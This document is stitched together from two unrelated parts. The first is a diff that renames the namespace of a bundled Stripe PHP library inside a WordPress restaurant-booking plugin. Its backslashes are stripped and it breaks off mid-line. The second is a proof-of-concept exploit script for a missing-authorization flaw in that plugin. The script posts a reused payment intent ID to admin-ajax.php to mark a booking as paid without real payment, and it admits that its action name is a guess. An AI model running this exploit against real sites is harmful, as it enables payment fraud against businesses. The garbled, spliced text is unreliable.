  * This is an object representing your Stripe balance. You can retrieve it to see
@@ -20,12 +20,12 @@
  * Account Balances</a>.
  *
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property StripeStripeObject[] $available Funds that are available to be transferred or paid out, whether automatically by Stripe or explicitly via the <a href="https://stripe.com/docs/api#transfers">Transfers API</a> or <a href="https://stripe.com/docs/api#payouts">Payouts API</a>. The available balance for each currency and payment type can be found in the <code>source_types</code> property.
- * @property StripeStripeObject[] $connect_reserved Funds held due to negative balances on connected Custom accounts. The connect reserve balance for each currency and payment type can be found in the <code>source_types</code> property.
- * @property StripeStripeObject[] $instant_available Funds that can be paid out using Instant Payouts.
- * @property StripeStripeObject $issuing
+ * @property rtbStripeStripeObject[] $available Funds that are available to be transferred or paid out, whether automatically by Stripe or explicitly via the <a href="https://stripe.com/docs/api#transfers">Transfers API</a> or <a href="https://stripe.com/docs/api#payouts">Payouts API</a>. The available balance for each currency and payment type can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $connect_reserved Funds held due to negative balances on connected Custom accounts. The connect reserve balance for each currency and payment type can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $instant_available Funds that can be paid out using Instant Payouts.
+ * @property rtbStripeStripeObject $issuing
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
- * @property StripeStripeObject[] $pending Funds that are not yet available in the balance, due to the 7-day rolling pay cycle. The pending balance for each currency, and for each payment type, can be found in the <code>source_types</code> property.
+ * @property rtbStripeStripeObject[] $pending Funds that are not yet available in the balance, due to the 7-day rolling pay cycle. The pending balance for each currency, and for each payment type, can be found in the <code>source_types</code> property.
  */
 class Balance extends SingletonApiResource
 {
@@ -34,9 +34,9 @@
     /**
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
-     * @return StripeBalance
+     * @return rtbStripeBalance
      */
     public static function retrieve($opts = null)
     {
--- a/restaurant-reservations/lib/stripe/lib/BalanceTransaction.php
+++ b/restaurant-reservations/lib/stripe/lib/BalanceTransaction.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * Balance transactions represent funds moving through your Stripe account. They're
@@ -22,10 +22,10 @@
  * @property null|string $description An arbitrary string attached to the object. Often useful for displaying to users.
  * @property null|float $exchange_rate The exchange rate used, if applicable, for this transaction. Specifically, if money was converted from currency A to currency B, then the <code>amount</code> in currency A, times <code>exchange_rate</code>, would be the <code>amount</code> in currency B. For example, suppose you charged a customer 10.00 EUR. Then the PaymentIntent's <code>amount</code> would be <code>1000</code> and <code>currency</code> would be <code>eur</code>. Suppose this was converted into 12.34 USD in your Stripe account. Then the BalanceTransaction's <code>amount</code> would be <code>1234</code>, <code>currency</code> would be <code>usd</code>, and <code>exchange_rate</code> would be <code>1.234</code>.
  * @property int $fee Fees (in %s) paid for this transaction.
- * @property StripeStripeObject[] $fee_details Detailed breakdown of fees (in %s) paid for this transaction.
+ * @property rtbStripeStripeObject[] $fee_details Detailed breakdown of fees (in %s) paid for this transaction.
  * @property int $net Net amount of the transaction, in %s.
  * @property string $reporting_category <a href="https://stripe.com/docs/reports/reporting-categories">Learn more</a> about how reporting categories can help you understand balance transactions from an accounting perspective.
- * @property null|string|StripeStripeObject $source The Stripe object to which this transaction is related.
+ * @property null|string|rtbStripeStripeObject $source The Stripe object to which this transaction is related.
  * @property string $status If the transaction's net funds are available in the Stripe balance yet. Either <code>available</code> or <code>pending</code>.
  * @property string $type Transaction type: <code>adjustment</code>, <code>advance</code>, <code>advance_funding</code>, <code>anticipation_repayment</code>, <code>application_fee</code>, <code>application_fee_refund</code>, <code>charge</code>, <code>connect_collection_transfer</code>, <code>contribution</code>, <code>issuing_authorization_hold</code>, <code>issuing_authorization_release</code>, <code>issuing_dispute</code>, <code>issuing_transaction</code>, <code>payment</code>, <code>payment_failure_refund</code>, <code>payment_refund</code>, <code>payout</code>, <code>payout_cancel</code>, <code>payout_failure</code>, <code>refund</code>, <code>refund_failure</code>, <code>reserve_transaction</code>, <code>reserved_funds</code>, <code>stripe_fee</code>, <code>stripe_fx_fee</code>, <code>tax_fee</code>, <code>topup</code>, <code>topup_reversal</code>, <code>transfer</code>, <code>transfer_cancel</code>, <code>transfer_failure</code>, or <code>transfer_refund</code>. <a href="https://stripe.com/docs/reports/balance-transaction-types">Learn more</a> about balance transaction types and what they represent. If you are looking to classify transactions for accounting purposes, you might want to consider <code>reporting_category</code> instead.
  */
--- a/restaurant-reservations/lib/stripe/lib/BankAccount.php
+++ b/restaurant-reservations/lib/stripe/lib/BankAccount.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace Stripe;
+namespace rtbStripe;

 /**
  * These bank accounts are payment methods on <code>Customer</code> objects.
@@ -20,18 +20,18 @@
  *
  * @property string $id Unique identifier for the object.
  * @property string $object String representing the object's type. Objects of the same type share the same value.
- * @property null|string|StripeAccount $account The ID of the account that the bank account is associated with.
+ * @property null|string|rtbStripeAccount $account The ID of the account that the bank account is associated with.
  * @property null|string $account_holder_name The name of the person or business that owns the bank account.
  * @property null|string $account_holder_type The type of entity that holds the account. This can be either <code>individual</code> or <code>company</code>.
  * @property null|string[] $available_payout_methods A set of available payout methods for this bank account. Only values from this set should be passed as the <code>method</code> when creating a payout.
  * @property null|string $bank_name Name of the bank associated with the routing number (e.g., <code>WELLS FARGO</code>).
  * @property string $country Two-letter ISO code representing the country the bank account is located in.
  * @property string $currency Three-letter <a href="https://stripe.com/docs/payouts">ISO code for the currency</a> paid out to the bank account.
- * @property null|string|StripeCustomer $customer The ID of the customer that the bank account is associated with.
+ * @property null|string|rtbStripeCustomer $customer The ID of the customer that the bank account is associated with.
  * @property null|bool $default_for_currency Whether this bank account is the default external account for its currency.
  * @property null|string $fingerprint Uniquely identifies this particular bank account. You can use this attribute to check whether two bank accounts are the same.
  * @property string $last4 The last four digits of the bank account number.
- * @property null|StripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
+ * @property null|rtbStripeStripeObject $metadata Set of <a href="https://stripe.com/docs/api/metadata">key-value pairs</a> that you can attach to an object. This can be useful for storing additional information about the object in a structured format.
  * @property null|string $routing_number The routing transit number for the bank account.
  * @property string $status <p>For bank accounts, possible values are <code>new</code>, <code>validated</code>, <code>verified</code>, <code>verification_failed</code>, or <code>errored</code>. A bank account that hasn't had any activity or validation performed is <code>new</code>. If Stripe can determine that the bank account exists, its status will be <code>validated</code>. Note that there often isn’t enough information to know (e.g., for smaller credit unions), and the validation is not always run. If customer bank account verification has succeeded, the bank account status will be <code>verified</code>. If the verification failed for any reason, such as microdeposit failure, the status will be <code>verification_failed</code>. If a transfer sent to this bank account fails, we'll set the status to <code>errored</code> and will not continue to send transfers until the bank details are updated.</p><p>For external accounts, possible values are <code>new</code> and <code>errored</code>. Validations aren't run against external accounts because they're only used for payouts. This means the other statuses don't apply. If a transfer fails, the status is set to <code>errored</code> and transfers are stopped until account details are updated.</p>
  */
@@ -82,7 +82,7 @@
      * @param array|string $_id
      * @param null|array|string $_opts
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      */
     public static function retrieve($_id, $_opts = null)
     {
@@ -100,7 +100,7 @@
      * @param null|array $_params
      * @param null|array|string $_options
      *
-     * @throws StripeExceptionBadMethodCallException
+     * @throws rtbStripeExceptionBadMethodCallException
      */
     public static function update($_id, $_params = null, $_options = null)
     {
@@ -117,7 +117,7 @@
      * @param null|array $params
      * @param null|array|string $opts
      *
-     * @throws StripeExceptionApiErrorException if the request fails
+     * @throws rtbStripeExceptionApiErrorException if the request fails
      *
      * @return BankAccount the verified bank account
      */
--- a/restaurant-reservations/lib/stripe/lib/BaseStripeClient.php
+++ b/restaurant-reservations/lib/stripe/lib/BaseStripeClient.php
@@ -1,6 +1,6 @@
 <?php

-namespace Stripe;
+namespace rtbStripe;

 class BaseStripeClient implements StripeClientInterface
 {
@@ -16,7 +16,7 @@
     /** @var array<string, mixed> */
     private $config;

-    /** @var StripeUtilRequestOptions */
+    /** @var rtbStripeUtilRequestOptions */
     private $defaultOpts;

     /**
@@ -52,7 +52,7 @@
         if (is_string($config)) {
             $config = ['api_key' => $config];
         } elseif (!is_array($config)) {
-            throw new StripeExceptionInvalidArgumentException('$config must be a string or an array');
+            throw new rtbStripeExceptionInvalidArgumentException('$config must be a string or an array');
         }

         $config = array_merge($this->getDefaultConfig(), $config);
@@ -60,7 +60,7 @@

         $this->config = $config;

-        $this->defaultOpts = StripeUtilRequestOptions::parse([
+        $this->defaultOpts = rtbStripeUtilRequestOptions::parse([
             'stripe_account' => $config['stripe_account'],
             'stripe_version' => $config['stripe_version'],
         ]);
@@ -122,18 +122,18 @@
      * @param string $method the HTTP method
      * @param string $path the path of the request
      * @param array $params the parameters of the request
-     * @param array|StripeUtilRequestOptions $opts the special modifiers of the request
+     * @param array|rtbStripeUtilRequestOptions $opts the special modifiers of the request
      *
-     * @return StripeStripeObject the object returned by Stripe's API
+     * @return rtbStripeStripeObject the object returned by Stripe's API
      */
     public function request($method, $path, $params, $opts)
     {
         $opts = $this->defaultOpts->merge($opts, true);
         $baseUrl = $opts->apiBase ?: $this->getApiBase();
-        $requestor = new StripeApiRequestor($this->apiKeyForRequest($opts), $baseUrl);
+        $requestor = new rtbStripeApiRequestor($this->apiKeyForRequest($opts), $baseUrl);
         list($response, $opts->apiKey) = $requestor->request($method, $path, $params, $opts->headers);
         $opts->discardNonPersistentHeaders();
-        $obj = StripeUtilUtil::convertToStripeObject($response->json, $opts);
+        $obj = rtbStripeUtilUtil::convertToStripeObject($response->json, $opts);
         $obj->setLastResponse($response);

         return $obj;
@@ -145,18 +145,18 @@
      * @param string $method the HTTP method
      * @param string $path the path of the request
      * @param array $params the parameters of the request
-     * @param array|StripeUtilRequestOptions $opts the special modifiers of the request
+     * @param array|rtbStripeUtilRequestOptions $opts the special modifiers of the request
      *
-     * @return StripeCollection of ApiResources
+     * @return rtbStripeCollection of ApiResources
      */
     public function requestCollection($method, $path, $params, $opts)
     {
         $obj = $this->request($method, $path, $params, $opts);
-        if (!($obj instanceof StripeCollection)) {
+        if (!($obj instanceof rtbStripeCollection)) {
             $received_class = get_class($obj);
-            $msg = "Expected to receive `Stripe\Collection` object from Stripe API. Instead received `{$received_class}`.";
+            $msg = "Expected to receive `rtbStripe\Collection` object from Stripe API. Instead received `{$received_class}`.";

-            throw new StripeExceptionUnexpectedValueException($msg);
+            throw new rtbStripeExceptionUnexpectedValueException($msg);
         }
         $obj->setFilters($params);

@@ -164,9 +164,9 @@
     }

     /**
-     * @param StripeUtilRequestOptions $opts
+     * @param rtbStripeUtilRequestOptions $opts
      *
-     * @throws StripeExceptionAuthenticationException
+     * @throws rtbStripeExceptionAuthenticationException
      *
      * @return string
      */
@@ -179,7 +179,7 @@
                 . 'StripeClient instance, or provide it on a per-request basis '
                 . 'using the `api_key` key in the $opts argument.';

-            throw new StripeExceptionAuthenticationException($msg);
+            throw new rtbStripeExceptionAuthenticationException($msg);
         }

         return $apiKey;
@@ -206,55 +206,55 @@
     /**
      * @param array<string, mixed> $config
      *
-     * @throws StripeExceptionInvalidArgumentException
+     * @throws rtbStripeExceptionInvalidArgumentException
      */
     private function validateConfig($config)
     {
         // api_key
         if (null !== $config['api_key'] && !is_string($config['api_key'])) {
-            throw new StripeExceptionInvalidArgumentException('api_key must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('api_key must be null or a string');
         }

         if (null !== $config['api_key'] && ('' === $config['api_key'])) {
             $msg = 'api_key cannot be the empty string';

-            throw new StripeExceptionInvalidArgumentException($msg);
+            throw new rtbStripeExceptionInvalidArgumentException($msg);
         }

         if (null !== $config['api_key'] && (preg_match('/s/', $config['api_key']))) {
             $msg = 'api_key cannot contain whitespace';

-            throw new StripeExceptionInvalidArgumentException($msg);
+            throw new rtbStripeExceptionInvalidArgumentException($msg);
         }

         // client_id
         if (null !== $config['client_id'] && !is_string($config['client_id'])) {
-            throw new StripeExceptionInvalidArgumentException('client_id must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('client_id must be null or a string');
         }

         // stripe_account
         if (null !== $config['stripe_account'] && !is_string($config['stripe_account'])) {
-            throw new StripeExceptionInvalidArgumentException('stripe_account must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('stripe_account must be null or a string');
         }

         // stripe_version
         if (null !== $config['stripe_version'] && !is_string($config['stripe_version'])) {
-            throw new StripeExceptionInvalidArgumentException('stripe_version must be null or a string');
+            throw new rtbStripeExceptionInvalidArgumentException('stripe_version must be null or a string');
         }

         // api_base
         if (!is_string($config['api_base'])) {
-            throw new StripeExceptionInvalidArgumentException('api_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('api_base must be a string');
         }

         // connect_base
         if (!is_string($config['connect_base'])) {
-            throw new StripeExceptionInvalidArgumentException('connect_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('connect_base must be a string');
         }

         // files_base
         if (!is_string($config['files_base'])) {
-            throw new StripeExceptionInvalidArgumentException('files_base must be a string');
+            throw new rtbStripeExceptionInvalidArgumentException('files_base must be a string');
         }

         // check absence of extra keys
@@ -263,7 +263,7 @@
             // Wrap in single quote to more easily catch trailing spaces errors
             $invalidKeys = "'" . implode("', '", $extraConfigKeys) . "'";

-            throw new StripeExceptionInvalidArgumentException('Found unknown key(s) in configuration array: ' . $invalidKeys);
+            throw new rtbStripeExceptionInvalidArgumentException('Found unknown key(s) in configuration array: ' . $invalidKeys);
         }
     }
 }
--- a/restaurant-reservations/lib/stripe/lib/BillingPortal/Configuration.php
+++ b/restaurant-reservations/lib/stripe/lib/BillingPortal/Configuration.php
@@ -2,7 +2,7 @@

 // File generated from our OpenAPI spec

-namespace StripeBillingPortal;
+namespace rtbStripeBillingPortal;

 /**
  * A portal configuration describes the functionality and behavior of a portal
@@ -12,20 +12,20 @@
  * @property string $object String representing the object's type. Objects of the same type share the same value.
  * @property bool $active Whether the configuration is active and can be used to create portal sessions.
  * @property null|string $application ID of the Connect Application that created the configuration.
- * @property StripeStripeObject $business_profile
+ * @property rtbStripeStripeObject $business_profile
  * @property int $created Time at which the object was created. Measured in seconds since the Unix epoch.
  * @property null|string $default_return_url The default URL to redirect customers to when they click on the portal's link to return to your website. This can be <a href="https://stripe.com/docs/api/customer_portal/sessions/create#create_portal_session-return_url">overriden</a> when creating the session.
- * @property StripeStripeObject $features
+ * @property rtbStripeStripeObject $features
  * @property bool $is_default Whether the configuration is the default. If <code>true</code>, this configuration can be managed in the Dashboard and portal sessions will use this configuration unless it is overriden when creating the session.
  * @property bool $livemode Has the value <code>true</code> if the object exists in live mode or the value <code>false</code> if the object exists in test mode.
  * @property int $updated Time at which the object was last updated. Measured in seconds since the Unix epoch.
  */
-class Configuration extends StripeApiResource
+class Configuration extends rtbStripeApiResource
 {
     const OBJECT_NAME = 'billing_po

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54830 - Five Star Restaurant Reservations – WordPress Booking Plugin <= 2.7.19 - Missing Authorization

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// Step 1: Obtain a valid booking ID (in a real attack, this might be obtained from booking form)
// For demonstration, we assume we have a booking ID from a previous legitimate submission
$booking_id = 1; // This would normally be fetched from the booking

// Step 2: The attacker needs a valid payment_intent_id. In the vulnerable version,
// the attacker can simply guess or brute-force a stored intent ID, or reuse one from a legitimate booking.
// Since the patch also adds server-side verification, the older version only compared the posted payment_id
// against the stored value. If the attacker can obtain any valid stripe_payment_intent_id (e.g., from a previous booking),
// they can reuse it.

// For demonstration, we assume the attacker knows or has leaked a valid stripe_payment_intent_id
$stripe_payment_intent_id = 'pi_1234567890abcdef'; // This would need to exist in the database

// Step 3: Craft the POST data to trigger the payment confirmation action
// The exact action name depends on the plugin's AJAX hooks; common patterns include 'rtb_process_payment' or similar.
// Here we use a generic AJAX action that processes payment for a given booking.
$post_data = array(
    'action' => 'rtb_process_payment', // Varies per plugin version; may need adjustment
    'booking_id' => $booking_id,
    'payment_id' => $stripe_payment_intent_id,
    'payment_amount' => 1000, // Attacker can set amount to 10.00 (or any value) without real payment
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: " . htmlspecialchars($response) . "n";

if (false !== strpos($response, 'success')) {
    echo "[+] Vulnerability confirmed: Payment validation bypassed without actual payment.n";
} else {
    echo "[-] Exploit might have failed; check action name or parameters.n";
    echo "[*] Note: The plugin might require a valid nonce or different action name.n";
}